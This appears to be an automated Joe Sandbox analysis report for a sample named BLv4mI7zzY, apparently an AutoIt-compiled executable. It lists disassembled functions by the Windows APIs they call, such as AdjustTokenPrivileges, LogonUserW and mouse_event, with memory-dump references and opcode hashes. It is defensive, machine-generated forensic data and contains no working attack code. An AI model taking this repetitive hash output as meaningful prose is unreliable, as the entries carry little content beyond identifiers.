                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 386ceebf5b5a27f8f372b48027186c2ba5ab66a2918bc483bd29f37b3549962c
                                                              • Instruction ID: e367b31ae513eb1ebf8fbe74008512d53d981ee92f636ef93e22fb0967879789
                                                              • Opcode Fuzzy Hash: 386ceebf5b5a27f8f372b48027186c2ba5ab66a2918bc483bd29f37b3549962c
                                                              • Instruction Fuzzy Hash: 90F04F7595130CBFDF00DFF4DC89AAEB7BCEF08201F504579A505E2191D6756A488B54
                                                              APIs
                                                              • __time64.LIBCMT ref: 0049889B
                                                                • Part of subcall function 0045520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00498F6E,00000000,?,?,?,?,0049911F,00000000,?), ref: 00455213
                                                                • Part of subcall function 0045520A: __aulldiv.LIBCMT ref: 00455233
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID: 0eO
                                                              • API String ID: 2893107130-633601889
                                                              • Opcode ID: 87a85016b41be3342b1ea848f0d837c71bf747edc38200afd93f0f845cf9d770
                                                              • Instruction ID: 322450015eccb100fb1152b0f8b4275a8a9636f91a9386166dc1aea2a12f82a7
                                                              • Opcode Fuzzy Hash: 87a85016b41be3342b1ea848f0d837c71bf747edc38200afd93f0f845cf9d770
                                                              • Instruction Fuzzy Hash: 7521B4326355108BC729CF29D841A62B7E1EFA5311B698E7DD1F5CB2D0CB34B905CB58
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 0049C6FB
                                                              • FindClose.KERNEL32(00000000), ref: 0049C72B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: 4e51ee8064c0f90d3612b502c40801a4b426e762f04c7ae9d056d0d996c1f545
                                                              • Instruction ID: 052eea4fec4336a2f994dad91ef24d4591c447ea34191900e320a19b3586a6a2
                                                              • Opcode Fuzzy Hash: 4e51ee8064c0f90d3612b502c40801a4b426e762f04c7ae9d056d0d996c1f545
                                                              • Instruction Fuzzy Hash: B01182716102009FDB14EF29D88592AF7E4EF85324F00856EF8A987290DB74AC05CF85
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004A9468,?,004BFB84,?), ref: 0049A097
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004A9468,?,004BFB84,?), ref: 0049A0A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: 38ac3e07880e6ab55a1db55ad630cc7dd8657f35acc07b4e4a0a100d79fc0d61
                                                              • Instruction ID: 013f2d71780aecbc309f99a3b5abb5da711d41590e65d135f7e38b9e7669746a
                                                              • Opcode Fuzzy Hash: 38ac3e07880e6ab55a1db55ad630cc7dd8657f35acc07b4e4a0a100d79fc0d61
                                                              • Instruction Fuzzy Hash: 00F0823510522DABDB219FA4CC48FEA77ACBF08361F00426AF909D7291D6349954CBE6
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00488309), ref: 004881E0
                                                              • CloseHandle.KERNEL32(?,?,00488309), ref: 004881F2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 1405de41f549aaf5185613901148e4f9c7815b8dea8035f796c0d3cfb0d03e62
                                                              • Instruction ID: c39ba2021f9f491ffd5f223a72ff11f164aaf03953ac32fadb0d8706cd46c1de
                                                              • Opcode Fuzzy Hash: 1405de41f549aaf5185613901148e4f9c7815b8dea8035f796c0d3cfb0d03e62
                                                              • Instruction Fuzzy Hash: A1E08C32010611AFE7212B21EC09D7B7BEAEF04315724893EF8AA80431CB22AC94DB18
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00458D57,?,?,?,00000001), ref: 0045A15A
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0045A163
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 3e9d539b575c0c63c9de12c45c5682115cb5ec51b70c8cbcfea6a0a816f17b34
                                                              • Instruction ID: a075d9e47cbb1835aac0b86d1db2a18de91b7f17087bed901930b20f7181ddee
                                                              • Opcode Fuzzy Hash: 3e9d539b575c0c63c9de12c45c5682115cb5ec51b70c8cbcfea6a0a816f17b34
                                                              • Instruction Fuzzy Hash: F8B09231054208ABCA002B91EC09B883FA8EB54AA2F409130FA0E84C60CB6254548A99
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1a067cf7fe18c78231ac75fe64c90add8491e9684d62f466b3a83a1279aeaeaf
                                                              • Instruction ID: 2a75325ba9bd5515e2c22bc6bed21b5331c8d2a43d786c067f5b3d5b0a40a215
                                                              • Opcode Fuzzy Hash: 1a067cf7fe18c78231ac75fe64c90add8491e9684d62f466b3a83a1279aeaeaf
                                                              • Instruction Fuzzy Hash: EB324661D29F014ED7639634D832336A248AFB73C9F14D737FC19B5AA6EB28D8874109
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fb839485504853003e39333346b6d179682e3f12be758fa0e3c188e027fd3139
                                                              • Instruction ID: 4ec43e41a5ed58355e6c5631dc69b7af3b9f9edafac0459d835274f60a3dc232
                                                              • Opcode Fuzzy Hash: fb839485504853003e39333346b6d179682e3f12be758fa0e3c188e027fd3139
                                                              • Instruction Fuzzy Hash: FDB12030E2AF454DD36396398935336BA4CAFBB2C9F51D72BFC2670D22EB2185934145
                                                              APIs
                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00494C76
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: 199f9fc8e044cc8a9bb3ef738b75ef0820a12614c89c48681c31e997b1fd66c5
                                                              • Instruction ID: 3edbb597b197f9bc0689ca2e3291a3d5e6c1cd43ab9d48e4bb8910a0055e2f98
                                                              • Opcode Fuzzy Hash: 199f9fc8e044cc8a9bb3ef738b75ef0820a12614c89c48681c31e997b1fd66c5
                                                              • Instruction Fuzzy Hash: 75D05EA012220A3DECA80720CD5FFBB1909E3C0795F86C17B7241952C1E8DC6803A03D
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00488389), ref: 004887D1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: 8824dc4b7df1e353a1dcbbb959f6b633c2cfd80876bfaeaf3fa433245804c441
                                                              • Instruction ID: 1d00d46061c686e3f10d267c637dd3566d94da0f4c3f757cb04711a123e74e3a
                                                              • Opcode Fuzzy Hash: 8824dc4b7df1e353a1dcbbb959f6b633c2cfd80876bfaeaf3fa433245804c441
                                                              • Instruction Fuzzy Hash: 08D05E3226050EABEF019EA4DC02EAE3B69EB04B01F408121FE15C50A1C775E835AB60
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0045A12A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 833e008c856389094ed8f7b625b265ee6fbd632d459089db0fbe85a7aad122aa
                                                              • Instruction ID: 07c3cf51378e8e2cb391969c7cf96deda484a3edf4a1a4d3a50dbbef239d57a8
                                                              • Opcode Fuzzy Hash: 833e008c856389094ed8f7b625b265ee6fbd632d459089db0fbe85a7aad122aa
                                                              • Instruction Fuzzy Hash: EDA0113000020CAB8A002B82EC08888BFACEA002A0B008030F80E808228B32A8208A88
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 413dd36d905b2f0ed312ba02c1d044cec4ec28d8e6b712eb562a6ee50bbd68a2
                                                              • Instruction ID: 16e6ecc3f3a490f6546d3eb96cec47fdd0950cb5658ed1af10714e3e8864bd24
                                                              • Opcode Fuzzy Hash: 413dd36d905b2f0ed312ba02c1d044cec4ec28d8e6b712eb562a6ee50bbd68a2
                                                              • Instruction Fuzzy Hash: 87224730904546CBEF389A64C49477E77A1FB41304F28886FD9429B692DFBC9D92CB4E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction ID: a657e96a5fd69ee023ba3b57fe23091c84aa4d742d73d5aece2d39dcdc14b80a
                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                              • Instruction Fuzzy Hash: 2EC194322050930ADB2D4639853413FBAA15EA37B371A075FDCB3CB2D6EE18D92DD624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction ID: 5298415ba48e282cbcbfdb2a03570802c99161a43fed6e2753e21ff239c1f2ed
                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                              • Instruction Fuzzy Hash: DAC1C6322050930ADF2D4639853413FBAA15EA37B271A075FDCB2DB2D6EE18D92DD624
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction ID: 1c905a688ab3d13a7d57946aa2942c1e622466bf09cdbddc61faca874ff65930
                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                              • Instruction Fuzzy Hash: 9AC1753220519309DF2D4639847423FBAA15EA27B331A075FDCB3CB2E6EE18D96DD614
                                                              APIs
                                                              • DeleteObject.GDI32(00000000), ref: 004A785B
                                                              • DeleteObject.GDI32(00000000), ref: 004A786D
                                                              • DestroyWindow.USER32 ref: 004A787B
                                                              • GetDesktopWindow.USER32 ref: 004A7895
                                                              • GetWindowRect.USER32(00000000), ref: 004A789C
                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 004A79DD
                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 004A79ED
                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7A35
                                                              • GetClientRect.USER32(00000000,?), ref: 004A7A41
                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 004A7A7B
                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7A9D
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AB0
                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7ABB
                                                              • GlobalLock.KERNEL32(00000000), ref: 004A7AC4
                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AD3
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004A7ADC
                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7AE3
                                                              • GlobalFree.KERNEL32(00000000), ref: 004A7AEE
                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7B00
                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,004C2CAC,00000000), ref: 004A7B16
                                                              • GlobalFree.KERNEL32(00000000), ref: 004A7B26
                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 004A7B4C
                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 004A7B6B
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7B8D
                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 004A7D7A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                              • API String ID: 2211948467-2373415609
                                                              • Opcode ID: d0ef7831147f409728552efc82b7c8db152d594602f7e342455dfe7a3720dc30
                                                              • Instruction ID: 9d174577acfaf846f0efef7d241e86aaf4933d77a7443e79a57ad5e0aacdee0b
                                                              • Opcode Fuzzy Hash: d0ef7831147f409728552efc82b7c8db152d594602f7e342455dfe7a3720dc30
                                                              • Instruction Fuzzy Hash: 68027071900105EFDB14DFA8DC89EAE7BB9FF49314F10426AF905AB2A1C774AD05CB68
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,004BF910), ref: 004B3627
                                                              • IsWindowVisible.USER32(?), ref: 004B364B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpperVisibleWindow
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 4105515805-45149045
                                                              • Opcode ID: 37b6da3ef58ba0dec24ea2a0c796960bfde3353040a3548432e562c00bc78da5
                                                              • Instruction ID: 0b268240c946aad4d7549058dc85b8d51b002f049c8d1aea90deeab0cead7edd
                                                              • Opcode Fuzzy Hash: 37b6da3ef58ba0dec24ea2a0c796960bfde3353040a3548432e562c00bc78da5
                                                              • Instruction Fuzzy Hash: 43D171742043019BCB14EF12C451AAE77A1AF95349F14885FF8855B3E3DB39EE0ACB5A
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 004BA630
                                                              • GetSysColorBrush.USER32(0000000F), ref: 004BA661
                                                              • GetSysColor.USER32(0000000F), ref: 004BA66D
                                                              • SetBkColor.GDI32(?,000000FF), ref: 004BA687
                                                              • SelectObject.GDI32(?,00000000), ref: 004BA696
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 004BA6C1
                                                              • GetSysColor.USER32(00000010), ref: 004BA6C9
                                                              • CreateSolidBrush.GDI32(00000000), ref: 004BA6D0
                                                              • FrameRect.USER32(?,?,00000000), ref: 004BA6DF
                                                              • DeleteObject.GDI32(00000000), ref: 004BA6E6
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 004BA731
                                                              • FillRect.USER32(?,?,00000000), ref: 004BA763
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BA78E
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(00000012), ref: 004BA903
                                                                • Part of subcall function 004BA8CA: SetTextColor.GDI32(?,?), ref: 004BA907
                                                                • Part of subcall function 004BA8CA: GetSysColorBrush.USER32(0000000F), ref: 004BA91D
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(0000000F), ref: 004BA928
                                                                • Part of subcall function 004BA8CA: GetSysColor.USER32(00000011), ref: 004BA945
                                                                • Part of subcall function 004BA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 004BA953
                                                                • Part of subcall function 004BA8CA: SelectObject.GDI32(?,00000000), ref: 004BA964
